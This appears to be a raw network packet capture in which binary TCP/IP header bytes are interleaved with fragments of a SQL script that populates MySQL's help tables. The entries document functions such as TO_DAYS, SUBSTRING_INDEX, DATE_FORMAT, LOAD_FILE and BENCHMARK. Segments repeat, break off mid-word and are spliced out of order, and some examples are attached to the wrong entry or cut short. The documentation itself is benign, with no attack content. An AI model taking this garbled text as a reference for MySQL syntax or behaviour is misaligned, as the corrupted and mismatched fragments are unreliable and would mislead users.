 `Gd%ons of each SELECT\nstatement should have the same type. (For example, the first column selected\nby the first statement should have the same type as the first column selected\nby the other statements.) The column names used in\nthe first SELECT statement are used as the column names for the\nresults returned.\n','SELECT ...\nUNION [ALL | DISTINCT]\nSELECT ...\n [UNION [ALL | DISTINCT]\n SELECT ...]',''),(242,'TO_DAYS',14,' TO_DAYS(date)\nGiven a date date, returns a daynumber (the number of days since year\n0).\n','mysql> SELECT TO_DAYS(950501);\n -> 728779\nmysql> SELECT TO_DAYS(\'1997-10-07\');\n -> 729669',''),(243,'NOT REGEXP',23,' expr NOT REGEXP pat\n expr NOT RLIKE pat\n\nThis is the same as NOT (expr REGEXP pat).\n','',''),(244,'NOT IN',26,' expr NOT IN (value,...)\nThis is the same as NOT (expr IN (value,...)).\n','',''),(245,'!',20,' NOT\n !\nLogical NOT.\nEvaluates to 1 if the operand is 0,\nto 0 if the operand is non-zero,\nand NOT NULL returns NULL.\n','mysql> SELECT NOT 10;\n -> 0\nmysql> SELECT NOT 0;\n -> 1\nmysql> SELECT NOT NULL;\n -> NULL\nmysql> SELECT ! (1+1);\n -> 0\nmysql> SELECT ! 1+1;\n -> 1',''),(246,'TEXT TYPE',1,' TEXT[(M)]\n\nA TEXT column with a maximum length of 65,535\n(C ZZ0`BiEL@/go0AE4@@ 3 P"l > )d:CG bbBi0`ET@/p܂Ao0E<*@?  3PTb E )QIM',23,' LTRIM(str)\nReturns the string str with leading space characters removed.\n','mysql> SELECT LTRIM(\' barbar\');\n -> \'barbar\'',''),(265,'REPAIR',7,'REPAIR TABLE repairs a possibly corrupted table.\nBy default,\nit has the same effect as myisamchk --recover tbl_name.\nREPAIR TABLE works only on MyISAM tables.\n','REPAIR [LOCAL | NO_WRITE_TO_BINLOG] TABLE\n tbl_name [, tbl_name] ... [QUICK] [EXTENDED] [USE_FRM]',''),(266,'INTERSECTS',11,' Intersects(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially intersects\ng2.\n','',''),(267,'MBRDISJOINT',8,' MBRDisjoint(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 are disjoint (do not intersect).\n','',''),(268,'SUBSTRING_INDEX',23,' SUBSTRING_INDEX(str,delim,count)\nReturns the substring from string str before count\noccurrences of the delimiter delim.\nIf count is positive, everything to the left of the final delimiter\n(counting from the left) is returned.\nIf count is negative, everything to the right of the final delimiter\n(counting from the right) is returned.\n','mysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', 2);\n -> \'www.mysql\'\nmysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', -2);\n Cb bb0`BiET@/Ԁo0SE<*@@  3PTb E )QIM',23,' LTRIM(str)\nReturns the string str with leading space characters removed.\n','mysql> SELECT LTRIM(\' barbar\');\n -> \'barbar\'',''),(265,'REPAIR',7,'REPAIR TABLE repairs a possibly corrupted table.\nBy default,\nit has the same effect as myisamchk --recover tbl_name.\nREPAIR TABLE works only on MyISAM tables.\n','REPAIR [LOCAL | NO_WRITE_TO_BINLOG] TABLE\n tbl_name [, tbl_name] ... [QUICK] [EXTENDED] [USE_FRM]',''),(266,'INTERSECTS',11,' Intersects(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially intersects\ng2.\n','',''),(267,'MBRDISJOINT',8,' MBRDisjoint(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 are disjoint (do not intersect).\n','',''),(268,'SUBSTRING_INDEX',23,' SUBSTRING_INDEX(str,delim,count)\nReturns the substring from string str before count\noccurrences of the delimiter delim.\nIf count is positive, everything to the left of the final delimiter\n(counting from the left) is returned.\nIf count is negative, everything to the right of the final delimiter\n(counting from the right) is returned.\n','mysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', 2);\n -> \'www.mysql\'\nmysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', -2);\n C bbBi0`ET@/p܂Ao0E<*@?  3PYb ba )R -> \'mysql.com\'',''),(269,'ENCODE',17,' ENCODE(str,pass_str)\nEncrypt str using pass_str as the password.\nTo decrypt the result, use DECODE().\n\nThe result is a binary string of the same length as str.\nIf you want to save it in a column, use a BLOB column type.\n','',''),(270,'TRUNCATE',4,' TRUNCATE(X,D)\nReturns the number X, truncated to D decimals. If D\nis 0, the result has no decimal point or fractional part.\nD can be negative to truncate (make zero) D digits left of the\ndecimal point of the value X.\n','mysql> SELECT TRUNCATE(1.223,1);\n -> 1.2\nmysql> SELECT TRUNCATE(1.999,1);\n -> 1.9\nmysql> SELECT TRUNCATE(1.999,0);\n -> 1\nmysql> SELECT TRUNCATE(-1.999,1);\n -> -1.9\nmysql> SELECT TRUNCATE(122,-2);\n -> 100',''),(271,'TIMESTAMPADD',14,' TIMESTAMPADD(interval,int_expr,datetime_expr)\n\nAdds the integer expression int_expr to the date or datetime expression\ndatetime_expr. The unit for int_expr is given by the\ninterval argument, which should be one of the following values:\nFRAC_SECOND,\nSECOND,\nMINUTE,\nHOUR,\nDAY,\nWEEK,\nMONTH,\nQUARTER,\nor\nYEAR.\n\nThe interval value may be specified using one of keywords as shown,\nor with a prefix of SQL_TSI_. For example, DAY or\nSQL_TSI_DAY both are legal.\n','',Cƨ bb0`BiET@/Ԁo0SE<*@@  3PYb ba )R -> \'mysql.com\'',''),(269,'ENCODE',17,' ENCODE(str,pass_str)\nEncrypt str using pass_str as the password.\nTo decrypt the result, use DECODE().\n\nThe result is a binary string of the same length as str.\nIf you want to save it in a column, use a BLOB column type.\n','',''),(270,'TRUNCATE',4,' TRUNCATE(X,D)\nReturns the number X, truncated to D decimals. If D\nis 0, the result has no decimal point or fractional part.\nD can be negative to truncate (make zero) D digits left of the\ndecimal point of the value X.\n','mysql> SELECT TRUNCATE(1.223,1);\n -> 1.2\nmysql> SELECT TRUNCATE(1.999,1);\n -> 1.9\nmysql> SELECT TRUNCATE(1.999,0);\n -> 1\nmysql> SELECT TRUNCATE(-1.999,1);\n -> -1.9\nmysql> SELECT TRUNCATE(122,-2);\n -> 100',''),(271,'TIMESTAMPADD',14,' TIMESTAMPADD(interval,int_expr,datetime_expr)\n\nAdds the integer expression int_expr to the date or datetime expression\ndatetime_expr. The unit for int_expr is given by the\ninterval argument, which should be one of the following values:\nFRAC_SECOND,\nSECOND,\nMINUTE,\nHOUR,\nDAY,\nWEEK,\nMONTH,\nQUARTER,\nor\nYEAR.\n\nThe interval value may be specified using one of keywords as shown,\nor with a prefix of SQL_TSI_. For example, DAY or\nSQL_TSI_DAY both are legal.\n','',C __Bi0`EQ@/Plo0E9i@?pr  P* SELECT GREATEST(2,0);\n -> 2\nmysql> SELECT GREATEST(34.0,3.0,5.0,767.0);\n -> 767.0\nmysql> SELECT GREATEST(\'B\',\'A\',\'C\');\n -> \'C\'',''),(274,'OCTETLENGTH',23,' OCTET_LENGTH(str)\n\nOCTET_LENGTH() is a synonym for LENGTH().\n','',''),(275,'SECOND',14,' SECOND(time)\nReturns the second for time, in the range 0 to 59.\n','mysql> SELECT SECOND(\'10:05:03\');\n -> 3',''),(276,'BIT_AND',12,' BIT_AND(expr)\nReturns the bitwise AND of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','mysql> SELECT order.custid, customer.name, MAX(payments)\n -> FROM order,customer\n -> WHERE order.custid = customer.custid\n -> GROUP BY order.custid;',''),(277,'ATAN2',4,' ATAN(Y,X)\n ATAN2(Y,X)\nReturns the arc tangent of the two variables X and Y. It is\nsimilar to calculating the arc tangent of Y / X, except that the\nsigns of both arguments are used to determine the quadrant of the\nresult.\n','mysql> SELECT ATAN(-2,2);\n C ZZBi0`EL@/Plo0E4j@?pv  P* SELECT GREATEST(2,0);\n -> 2\nmysql> SELECT GREATEST(34.0,3.0,5.0,767.0);\n -> 767.0\nmysql> SELECT GREATEST(\'B\',\'A\',\'C\');\n -> \'C\'',''),(274,'OCTETLENGTH',23,' OCTET_LENGTH(str)\n\nOCTET_LENGTH() is a synonym for LENGTH().\n','',''),(275,'SECOND',14,' SECOND(time)\nReturns the second for time, in the range 0 to 59.\n','mysql> SELECT SECOND(\'10:05:03\');\n -> 3',''),(276,'BIT_AND',12,' BIT_AND(expr)\nReturns the bitwise AND of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','mysql> SELECT order.custid, customer.name, MAX(payments)\n -> FROM order,customer\n -> WHERE order.custid = customer.custid\n -> GROUP BY order.custid;',''),(277,'ATAN2',4,' ATAN(Y,X)\n ATAN2(Y,X)\nReturns the arc tangent of the two variables X and Y. It is\nsimilar to calculating the arc tangent of Y / X, except that the\nsigns of both arguments are used to determine the quadrant of the\nresult.\n','mysql> SELECT ATAN(-2,2);\n C, ZZ0`BiEL@/o0AE4j@@ov  P* -0.785398\nmysql> SELECT ATAN2(PI(),0);\n -> 1.570796',''),(278,'MBRCONTAINS',8,' MBRContains(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle of\ng1 contains the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Point(1 1)\');\nmysql> SELECT MBRContains(@g1,@g2), MBRContains(@g2,@g1);\n----------------------+----------------------+\n| MBRContains(@g1,@g2) | MBRContains(@g2,@g1) |\n+----------------------+----------------------+\n| 1 | 0 |\n+----------------------+----------------------+',''),(279,'HOUR',14,' HOUR(time)\nReturns the hour for time. The range of the return value is\n0 to 23 for time-of-day values.\n','mysql> SELECT HOUR(\'10:05:03\');\n -> 10',''),(280,'TYPE SET',1,' SET(\'value1\',\'value2\',...)\n\nA set. A string object that can have zero or more values, each of which must\nbe chosen from the list of values \'value1\', \'value2\',\n... A SET column can have a maximum of 64 members.\nSET values are represented internally as integers.\n \n','',''),(281,'SELECT',6,'SELECT is used to retrieve rows selected from one or more tables.\nSupport for UNION statements and subqCp bb0`BiET@/Ԁo0SE<*@@  3PhŸb ME )R -> -0.785398\nmysql> SELECT ATAN2(PI(),0);\n -> 1.570796',''),(278,'MBRCONTAINS',8,' MBRContains(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangle of\ng1 contains the Minimum Bounding Rectangle of g2.\n','mysql> SET @g1 = GeomFromText(\'Polygon((0 0,0 3,3 3,3 0,0 0))\');\nmysql> SET @g2 = GeomFromText(\'Point(1 1)\');\nmysql> SELECT MBRContains(@g1,@g2), MBRContains(@g2,@g1);\n----------------------+----------------------+\n| MBRContains(@g1,@g2) | MBRContains(@g2,@g1) |\n+----------------------+----------------------+\n| 1 | 0 |\n+----------------------+----------------------+',''),(279,'HOUR',14,' HOUR(time)\nReturns the hour for time. The range of the return value is\n0 to 23 for time-of-day values.\n','mysql> SELECT HOUR(\'10:05:03\');\n -> 10',''),(280,'TYPE SET',1,' SET(\'value1\',\'value2\',...)\n\nA set. A string object that can have zero or more values, each of which must\nbe chosen from the list of values \'value1\', \'value2\',\n... A SET column can have a maximum of 64 members.\nSET values are represented internally as integers.\n \n','',''),(281,'SELECT',6,'SELECT is used to retrieve rows selected from one or more tables.\nSupport for UNION statements and subqC bbBi0`ET@/p܂Ao0E<*@?  3Pmʟb  )Sueries is available as of MySQL\n4.0 and 4.1, respectively.\nSee [UNION, , UNION] and [Subqueries].\n\n --- Each select_expr indicates a column you want to retrieve.\n\n --- table_references indicates the table or tables from which to retrieve rows.\nIts syntax is described in [JOIN, , JOIN].\n\n --- where_definition consists of the keyword WHERE followed by\nan expression that indicates the condition or conditions that rows\nmust satisfy to be selected.\n\n\nSELECT can also be used to retrieve rows computed without reference to\nany table.\n','SELECT\n [ALL | DISTINCT | DISTINCTROW ]\n [HIGH_PRIORITY]\n [STRAIGHT_JOIN]\n [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]\n [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]\n select_expr, ...\n [INTO OUTFILE \'file_name\' export_options\n | INTO DUMPFILE \'file_name\']\n [FROM table_references\n [WHERE where_definition]\n [GROUP BY {col_name | expr | position}\n [ASC | DESC], ... [WITH ROLLUP]]\n [HAVING where_definition]\n [ORDER BY {col_name | expr | position}\n [ASC | DESC] , ...]\n [LIMIT {[offset,] row_count | row_count OFFSET offset}]\n [PROCEDURE procedure_name(argument_list)]\n [FOR UPDATE | LOCK IN SHARE MODE]]',''),(28Cº ZZBi0`EL@/܂Sŀo0E4@? 3 P"l )f:Cɺ ZZBi0`EL@/܂Sŀo0E4@? 3 P"l  )f=CϺ bbBiʪET@/o0oo0E<@@) PZ&pP 7=xC bb0`BiET@/Ԁo0SE<*@@  3Pmʟb  )Sueries is available as of MySQL\n4.0 and 4.1, respectively.\nSee [UNION, , UNION] and [Subqueries].\n\n --- Each select_expr indicates a column you want to retrieve.\n\n --- table_references indicates the table or tables from which to retrieve rows.\nIts syntax is described in [JOIN, , JOIN].\n\n --- where_definition consists of the keyword WHERE followed by\nan expression that indicates the condition or conditions that rows\nmust satisfy to be selected.\n\n\nSELECT can also be used to retrieve rows computed without reference to\nany table.\n','SELECT\n [ALL | DISTINCT | DISTINCTROW ]\n [HIGH_PRIORITY]\n [STRAIGHT_JOIN]\n [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]\n [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]\n select_expr, ...\n [INTO OUTFILE \'file_name\' export_options\n | INTO DUMPFILE \'file_name\']\n [FROM table_references\n [WHERE where_definition]\n [GROUP BY {col_name | expr | position}\n [ASC | DESC], ... [WITH ROLLUP]]\n [HAVING where_definition]\n [ORDER BY {col_name | expr | position}\n [ASC | DESC] , ...]\n [LIMIT {[offset,] row_count | row_count OFFSET offset}]\n [PROCEDURE procedure_name(argument_list)]\n [FOR UPDATE | LOCK IN SHARE MODE]]',''),(28C ZZ0`BiEL@/go0AE4@@ 3 P"l )f:C ZZ0`BiEL@/go0AE4@@ 3 P"l  )f=C% bb0`BiET@/Ԁo0SE<@@(  PZ&pO} 7=xC ZZBi0`EL@/Plo0E4^>@?B  3P: ؞N P y)VCż ZZ0`BiEL@/܀o0SE4^>@@B  3P: ؞N P y)VC bbBi0`ET@/p܂Ao0E<*@?  3Prҟb  )S2,'COT',4,' COT(X)\nReturns the cotangent of X.\n','mysql> SELECT COT(12);\n -> -1.57267341\nmysql> SELECT COT(0);\n -> NULL',''),(283,'BACKUP TABLE',7,'Note: This statement is deprecated. We are working on a better\nreplacement for it that will provide online backup capabilities.\nIn the meantime, the mysqlhotcopy script can be used instead.\n\nBACKUP TABLE copies to the backup directory the minimum number of\ntable files needed to restore the table, after flushing any buffered changes\nto disk. The statement works only for MyISAM tables. It copies the\n*.frm definition and *.MYD data files. The *.MYI\nindex file can be rebuilt from those two files.\nThe directory should be specified as a full pathname.\n','BACKUP TABLE tbl_name [, tbl_name] ... TO \'/path/to/backup/directory\'',''),(284,'LOAD_FILE',23,' LOAD_FILE(file_name)\nReads the file and returns the file contents as a string. The file\nmust be located on the server, you must specify the full pathname to the\nfile, and you must have the FILE privilege. The file must\nbe readable by all and be smaller than max_allowed_packet bytes.\n\nIf the file doesn\'t exist or cannot be read because one of the preceding\nconditions is not satisfied, the function returns NULL.\n','mysql> UPDATE tbl_name\C8 bb0`BiET@/Ԁo0SE<*@@  3Prҟb  )S2,'COT',4,' COT(X)\nReturns the cotangent of X.\n','mysql> SELECT COT(12);\n -> -1.57267341\nmysql> SELECT COT(0);\n -> NULL',''),(283,'BACKUP TABLE',7,'Note: This statement is deprecated. We are working on a better\nreplacement for it that will provide online backup capabilities.\nIn the meantime, the mysqlhotcopy script can be used instead.\n\nBACKUP TABLE copies to the backup directory the minimum number of\ntable files needed to restore the table, after flushing any buffered changes\nto disk. The statement works only for MyISAM tables. It copies the\n*.frm definition and *.MYD data files. The *.MYI\nindex file can be rebuilt from those two files.\nThe directory should be specified as a full pathname.\n','BACKUP TABLE tbl_name [, tbl_name] ... TO \'/path/to/backup/directory\'',''),(284,'LOAD_FILE',23,' LOAD_FILE(file_name)\nReads the file and returns the file contents as a string. The file\nmust be located on the server, you must specify the full pathname to the\nfile, and you must have the FILE privilege. The file must\nbe readable by all and be smaller than max_allowed_packet bytes.\n\nIf the file doesn\'t exist or cannot be read because one of the preceding\nconditions is not satisfied, the function returns NULL.\n','mysql> UPDATE tbl_name\C bbBi0`ET@/p܂Ao0E<*@?  3Pwڟb 3 )Tn SET blob_column=LOAD_FILE(\'/tmp/picture\')\n WHERE id=1;',''),(285,'POINTFROMTEXT',3,' PointFromText(wkt[,srid])\nConstructs a POINT value using its WKT representation and SRID.\n','',''),(286,'LOAD TABLE FROM MASTER',6,'LOAD TABLE tbl_name FROM MASTER\n\nTransfers a copy of the table from master to the slave. This statement is\nimplemented mainly for debugging of LOAD DATA FROM MASTER.\nIt requires that the account used for connecting to the master server has the\nRELOAD and SUPER privileges on the master and the\nSELECT privilege on the master table to load.\nOn the slave side, the user that issues LOAD TABLE FROM MASTER should\nhave privileges to drop and create the table.\n\nThe conditions for LOAD DATA FROM MASTER apply here, too. For\nexample, LOAD TABLE FROM MASTER works only for MyISAM tables.\nThe timeout notes for LOAD DATA FROM MASTER apply as well.\n','',''),(287,'GROUP_CONCAT',12,' GROUP_CONCAT(expr)\nThis function returns a string result with the concatenated non-NULL\nvalues from a group. It returns NULL if there are no non-NULL\nvalues. The full syntax is as follows:\n\nGROUP_CONCAT([DISTINCT] expr [,expr ...]\n [ORDER BY {unsigned_integer | col_name | expr}\n [ASC | DESC] [,col_name ...]]\n C ZZBi0`EL@/܂Sŀo0E4@? 3 PÀ"l )g=C bb0`BiET@/Ԁo0SE<*@@  3Pwڟb 3 )Tn SET blob_column=LOAD_FILE(\'/tmp/picture\')\n WHERE id=1;',''),(285,'POINTFROMTEXT',3,' PointFromText(wkt[,srid])\nConstructs a POINT value using its WKT representation and SRID.\n','',''),(286,'LOAD TABLE FROM MASTER',6,'LOAD TABLE tbl_name FROM MASTER\n\nTransfers a copy of the table from master to the slave. This statement is\nimplemented mainly for debugging of LOAD DATA FROM MASTER.\nIt requires that the account used for connecting to the master server has the\nRELOAD and SUPER privileges on the master and the\nSELECT privilege on the master table to load.\nOn the slave side, the user that issues LOAD TABLE FROM MASTER should\nhave privileges to drop and create the table.\n\nThe conditions for LOAD DATA FROM MASTER apply here, too. For\nexample, LOAD TABLE FROM MASTER works only for MyISAM tables.\nThe timeout notes for LOAD DATA FROM MASTER apply as well.\n','',''),(287,'GROUP_CONCAT',12,' GROUP_CONCAT(expr)\nThis function returns a string result with the concatenated non-NULL\nvalues from a group. It returns NULL if there are no non-NULL\nvalues. The full syntax is as follows:\n\nGROUP_CONCAT([DISTINCT] expr [,expr ...]\n [ORDER BY {unsigned_integer | col_name | expr}\n [ASC | DESC] [,col_name ...]]\n C ZZ0`BiEL@/go0AE4@@ 3 PÀ"l )g=Cv ZZBi0`EL@/܂Sŀo0E4@? 3 P"ˀ"l )g?C ZZ0`BiEL@/go0AE4@@ 3 P"ˀ"l )g?C bbBi0`ET@/p܂Ao0E<*@?  3P|⟪b  )T [SEPARATOR str_val])\n','mysql> SELECT student_name,\n -> GROUP_CONCAT(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(288,'DATE_FORMAT',14,' DATE_FORMAT(date,format)\nFormats the date value according to the format string. The\nfollowing specifiers may be used in the format string:\n\n Specifier Description\n %a Abbreviated weekday name (Sun..Sat)\n %b Abbreviated month name (Jan..Dec)\n %c Month, numeric (0..12)\n %D Day of the month with English suffix (0th, 1st, 2nd, 3rd, ...)\n %d Day of the month, numeric (00..31)\n %e Day of the month, numeric (0..31)\n %f Microseconds (000000..999999)\n %H Hour (00..23)\n %h Hour (01..12)\n %I Hour (01..12)\n %i Minutes, numeric (00..59)\n %j Day of year (001..366)\n %k Hour (0..23)\n %l Hour (1..12)\n %M Month name (January..December)\n %m Month, numeric (00..12)\n %p AM or PM\n %r Time, 12-hour (hh:mm:ss followed by AM or PM)\n %S Seconds (00..59)\n %s Seconds (00..59)\n %T Time, 24-hour (hh:mm:ss)\n %U Week (00..53), where Sunday is the first day of the week\n %u Week (00..53), where Monday is the first day of the week\n %V Week (01..53), where Sunday is the first day of the weekC bb0`BiET@/Ԁo0SE<*@@  3P|⟪b  )T [SEPARATOR str_val])\n','mysql> SELECT student_name,\n -> GROUP_CONCAT(test_score)\n -> FROM student\n -> GROUP BY student_name;',''),(288,'DATE_FORMAT',14,' DATE_FORMAT(date,format)\nFormats the date value according to the format string. The\nfollowing specifiers may be used in the format string:\n\n Specifier Description\n %a Abbreviated weekday name (Sun..Sat)\n %b Abbreviated month name (Jan..Dec)\n %c Month, numeric (0..12)\n %D Day of the month with English suffix (0th, 1st, 2nd, 3rd, ...)\n %d Day of the month, numeric (00..31)\n %e Day of the month, numeric (0..31)\n %f Microseconds (000000..999999)\n %H Hour (00..23)\n %h Hour (01..12)\n %I Hour (01..12)\n %i Minutes, numeric (00..59)\n %j Day of year (001..366)\n %k Hour (0..23)\n %l Hour (1..12)\n %M Month name (January..December)\n %m Month, numeric (00..12)\n %p AM or PM\n %r Time, 12-hour (hh:mm:ss followed by AM or PM)\n %S Seconds (00..59)\n %s Seconds (00..59)\n %T Time, 24-hour (hh:mm:ss)\n %U Week (00..53), where Sunday is the first day of the week\n %u Week (00..53), where Monday is the first day of the week\n %V Week (01..53), where Sunday is the first day of the weekCV bbBi0`ET@/أ  o0E<@?|  PPZ脀 W `Qd/2^16 - 1) characters.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest TEXT type largest\nenough to hold values M characters long.\n','',''),(247,'DOUBLE',1,' DOUBLE[(M,B)] [UNSIGNED] [ZEROFILL]\n\nA normal-size (double-precision) floating-point number. Allowable values are\n-1.7976931348623157E+308 to -2.2250738585072014E-308,\n0, and 2.2250738585072014E-308 to 1.7976931348623157E+308.\nIf UNSIGNED is specified, negative values are disallowed. M is the\ndisplay width and B is the number of bits of precision. DOUBLE\nwithout arguments or FLOAT(p) (where p is in the range from\n25 to 53) stands for a double-precision floating-point number. A\nsingle-precision floating-point number is accurate to approximately 7 decimal\nplaces; a double-precision floating-point number is accurate to approximately 15\ndecimal places.\n\n DOUBLE PRECISION[(M,D)] [UNSIGNED] [ZEROFILL]\n REAL[(M,D)] [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DOUBLE.\nException: If the server SQL mode includes the REAL_AS_FLOAT option,\nREAL is a synonym for FLOAT rather than DOUBLE.\n','',''),(248,'TIME',1,' TIME\n\nA time. The range is \'-838:59:59\' to \'838:59:59\'.\nMySQL displays TIME values in \'HH:MM:SS\' format, but\nallows Cr bb0`BiET@/o0AE<@@{  PPZ脀 W `Qd/2^16 - 1) characters.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest TEXT type largest\nenough to hold values M characters long.\n','',''),(247,'DOUBLE',1,' DOUBLE[(M,B)] [UNSIGNED] [ZEROFILL]\n\nA normal-size (double-precision) floating-point number. Allowable values are\n-1.7976931348623157E+308 to -2.2250738585072014E-308,\n0, and 2.2250738585072014E-308 to 1.7976931348623157E+308.\nIf UNSIGNED is specified, negative values are disallowed. M is the\ndisplay width and B is the number of bits of precision. DOUBLE\nwithout arguments or FLOAT(p) (where p is in the range from\n25 to 53) stands for a double-precision floating-point number. A\nsingle-precision floating-point number is accurate to approximately 7 decimal\nplaces; a double-precision floating-point number is accurate to approximately 15\ndecimal places.\n\n DOUBLE PRECISION[(M,D)] [UNSIGNED] [ZEROFILL]\n REAL[(M,D)] [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DOUBLE.\nException: If the server SQL mode includes the REAL_AS_FLOAT option,\nREAL is a synonym for FLOAT rather than DOUBLE.\n','',''),(248,'TIME',1,' TIME\n\nA time. The range is \'-838:59:59\' to \'838:59:59\'.\nMySQL displays TIME values in \'HH:MM:SS\' format, but\nallows CJ bbBi0`ET@/p܂Ao0E<*@?  3P켁꟪b 1 )T; used with %X\n %v Week (01..53), where Monday is the first day of the week; used with %x\n %W Weekday name (Sunday..Saturday)\n %w Day of the week (0=Sunday..6=Saturday)\n %X Year for the week where Sunday is the first day of the week, numeric, four digits; used with %V\n %x Year for the week, where Monday is the first day of the week, numeric, four digits; used with %v\n %Y Year, numeric, four digits\n %y Year, numeric, two digits\n %% A literal \'%\'.\n \n\nAll other characters are copied to the result without interpretation.\n\nThe %v, %V, %x, and %X format specifiers are\navailable as of MySQL 3.23.8. %f is available as of MySQL 4.1.1.\n\nAs of MySQL 3.23, the \'%\' character is required before\nformat specifier characters. In earlier versions of MySQL,\n\'%\' was optional.\n\nThe reason the ranges for the month and day specifiers begin with zero\nis that MySQL allows incomplete dates such as \'2004-00-00\' to be\nstored as of MySQL 3.23.\n','mysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%W %M %Y\');\n -> \'Saturday October 1997\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%H:%i:%s\');\n -> \'22:23:00\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%D %y %a %d %Ce bb0`BiET@/Ԁo0SE<*@@  3P켁꟪b 1 )T; used with %X\n %v Week (01..53), where Monday is the first day of the week; used with %x\n %W Weekday name (Sunday..Saturday)\n %w Day of the week (0=Sunday..6=Saturday)\n %X Year for the week where Sunday is the first day of the week, numeric, four digits; used with %V\n %x Year for the week, where Monday is the first day of the week, numeric, four digits; used with %v\n %Y Year, numeric, four digits\n %y Year, numeric, two digits\n %% A literal \'%\'.\n \n\nAll other characters are copied to the result without interpretation.\n\nThe %v, %V, %x, and %X format specifiers are\navailable as of MySQL 3.23.8. %f is available as of MySQL 4.1.1.\n\nAs of MySQL 3.23, the \'%\' character is required before\nformat specifier characters. In earlier versions of MySQL,\n\'%\' was optional.\n\nThe reason the ranges for the month and day specifiers begin with zero\nis that MySQL allows incomplete dates such as \'2004-00-00\' to be\nstored as of MySQL 3.23.\n','mysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%W %M %Y\');\n -> \'Saturday October 1997\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\', \'%H:%i:%s\');\n -> \'22:23:00\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%D %y %a %d %C bbBi0`ET@/p܂Ao0E<*@?  3P켆򟪮b b )Tm %b %j\');\n -> \'4th 97 Sat 04 10 Oct 277\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%H %k %I %r %T %S %w\');\n -> \'22 22 10 10:23:00 PM 22:23:00 00 6\'\nmysql> SELECT DATE_FORMAT(\'1999-01-01\', \'%X %V\');\n -> \'1998 52\'',''),(289,'BENCHMARK',25,' BENCHMARK(count,expr)\nThe BENCHMARK() function executes the expression expr\nrepeatedly count times. It may be used to time how fast MySQL\nprocesses the expression. The result value is always 0. The intended\nuse is from within the mysql client, which reports query execution times:\n','mysql> SELECT BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\'));\n+----------------------------------------------+\n| BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\')) |\n+----------------------------------------------+\n| 0 |\n+----------------------------------------------+\n1 row in set (4.74 sec)',''),(290,'YEAR',14,' YEAR(date)\nReturns the year for date, in the range 1000 to 9999.\n','mysql> SELECT YEAR(\'98-02-03\');\n -> 1998',''),(291,'SHOW ENGINE',6,'SHOW ENGINE displays log or status information about storage engines.\nThe following statements currently are supported:\n\nSHOW ENGINE BDB LOGS\nSHOW ENGINE INNODC bb0`BiET@/Ԁo0SE<*@@  3P켆򟪮b b )Tm %b %j\');\n -> \'4th 97 Sat 04 10 Oct 277\'\nmysql> SELECT DATE_FORMAT(\'1997-10-04 22:23:00\',\n \'%H %k %I %r %T %S %w\');\n -> \'22 22 10 10:23:00 PM 22:23:00 00 6\'\nmysql> SELECT DATE_FORMAT(\'1999-01-01\', \'%X %V\');\n -> \'1998 52\'',''),(289,'BENCHMARK',25,' BENCHMARK(count,expr)\nThe BENCHMARK() function executes the expression expr\nrepeatedly count times. It may be used to time how fast MySQL\nprocesses the expression. The result value is always 0. The intended\nuse is from within the mysql client, which reports query execution times:\n','mysql> SELECT BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\'));\n+----------------------------------------------+\n| BENCHMARK(1000000,ENCODE(\'hello\',\'goodbye\')) |\n+----------------------------------------------+\n| 0 |\n+----------------------------------------------+\n1 row in set (4.74 sec)',''),(290,'YEAR',14,' YEAR(date)\nReturns the year for date, in the range 1000 to 9999.\n','mysql> SELECT YEAR(\'98-02-03\');\n -> 1998',''),(291,'SHOW ENGINE',6,'SHOW ENGINE displays log or status information about storage engines.\nThe following statements currently are supported:\n\nSHOW ENGINE BDB LOGS\nSHOW ENGINE INNODC bbBi0`ET@/p܂Ao0E<*@?  3P켋b  )UB STATUS\n\nSHOW ENGINE BDB LOGS displays status information about existing\nBDB log files. It returns the following fields:\n\n\n File\nThe full path to the log file.\n\n Type\nThe log file type (BDB for Berkeley DB log files).\n\n Status\nThe status of the log file (FREE if the file can be removed, or\nIN USE if the file is needed by the transaction subsystem)\n\n \n\nSHOW ENGINE INNODB STATUS displays extensive information about the\nstate of the InnoDB storage engine.\n\nOlder (and now deprecated) synonyms for these statements are SHOW [BDB]\nLOGS and SHOW INNODB STATUS.\n\nSHOW ENGINE can be used as of MySQL 4.1.2.\n','SHOW ENGINE engine_name {LOGS | STATUS }',''),(292,'RELEASE_LOCK',21,' RELEASE_LOCK(str)\nReleases the lock named by the string str that was 